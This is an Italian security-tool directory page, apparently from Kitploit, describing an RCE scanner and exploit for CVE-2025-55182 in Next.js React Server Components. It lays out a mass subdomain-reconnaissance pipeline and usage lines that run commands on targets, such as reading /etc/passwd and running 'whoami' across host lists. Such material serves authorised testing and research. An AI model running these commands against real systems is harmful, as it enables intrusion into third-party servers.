Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182-Simple-Scanner — Scanner RCE ad alta fedeltà per CVE-2025-55182 che colpisce Next.js RSC. Supporta scansione di massa, esecuzione di comandi e pipeline di ricognizione automatizzate. Progettato per pentesters, ricercatori e cacciatori di bug. | Kitploit
Strumenti/GitHubGitHub/satriarizka/cve-2025-55182-simple-scanner
RicognizioneScanner di VulnerabilitàGenerazione di PayloadExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlApprendimento e Formazione

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
satriarizka/cve-2025-55182-simple-scanner

CVE-2025-55182-Simple-Scanner

Scanner RCE ad alta fedeltà per CVE-2025-55182 che colpisce Next.js RSC. Supporta scansione di massa, esecuzione di comandi e pipeline di ricognizione automatizzate. Progettato per pentesters, ricercatori e cacciatori di bug.

Vedi Repository
8 mesi faNon ancora revisionato

CVE-2025-55182: Scanner RCE per React Server Components

Un toolkit completo per rilevare e sfruttare CVE-2025-55182, una vulnerabilità critica di Remote Code Execution nelle applicazioni Next.js che utilizzano React Server Components.

Questo repository include uno scanner Bash unificato (modalità Singola e Massiva), implementazioni Python/Go e un flusso di lavoro per ricognizione bug bounty.

Scanner Menu Scanner Demo


📂 Struttura del Repository

  • scanner.sh — Script Bash tutto-in-uno per scansione Singolo Target e Massiva
  • python/exploit.py — Implementazione Python stabile (migliore escaping JSON)
  • go/main.go — Implementazione ad alte prestazioni (compilabile)

🚀 Flusso di Lavoro per Ricognizione (Metodologia Bug Bounty)

Per la caccia massiva su domini wildcard, usa questa pipeline per filtrare i target prima della scansione:

root@kitploit:~
# 1. Enumerate subdomains
subfinder -dL wildcards.txt -all -recursive > subs.txt

# 2. Filter for live hosts
httpx -l subs.txt -o live.txt

# 3. Pre-scan detection using Nuclei (optional)
nuclei -l live.txt -t CVE-2025-55182.yaml -o final.txt

🛠️ Utilizzo dello Scanner Bash (Consigliato)

Lo script scanner.sh supporta scansioni su singolo target e scansioni massive da un elenco di file.

🔧 Installazione

root@kitploit:~
chmod +x scanner.sh

1️⃣ Modalità Singolo Target

Ideale per verificare un target specifico con output dettagliato.

root@kitploit:~
# Basic check (defaults to "id")
./scanner.sh -d example.com

# Execute custom command
./scanner.sh -d https://target.com -c "cat /etc/passwd"

2️⃣ Modalità Scansione Massiva

Scansiona efficientemente un elenco di URL e salva gli host vulnerabili in un file.

root@kitploit:~
# Scan a list of URLs
./scanner.sh -l live.txt -c "whoami"

# Custom output file
./scanner.sh -l live.txt -o my_bounty.txt

Opzioni


🐍 Versione Python

Usa questa se incontri problemi con l'escape di caratteri speciali in Bash.

Requisiti

root@kitploit:~
pip install requests

Utilizzo

root@kitploit:~
python3 python/exploit.py -u http://target.com -c "uname -a"

🐹 Versione Go

Alte prestazioni, dipendenze minime.

Esecuzione diretta

root@kitploit:~
go run go/main.go -u http://target.com -c "id"

Compilazione binario

root@kitploit:~
cd go
go build -o cve-scanner main.go
./cve-scanner -u http://target.com

⚠️ Dichiarazione di non responsabilità

Questo strumento è solo per scopi educativi e test di sicurezza autorizzati. L'uso non autorizzato è strettamente illegale. Lo sviluppatore non si assume alcuna responsabilità per uso improprio o danni causati da questo programma.


🔗 Riferimenti

  • Dettaglio CVE NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-55182

  • Avviso di sicurezza React (vulnerabilità React Server Components): https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components

  • Template Nuclei di ProjectDiscovery: https://cloud.projectdiscovery.io/library/CVE-2025-55182

Scarica lo strumento
FlagDescrizione
-d, --domainURL del singolo target
-l, --listFile contenente un elenco di URL
-c, --commandComando da eseguire (default: id)
-o, --outputFile di output per host vulnerabili (default: vulnerable_hosts.txt)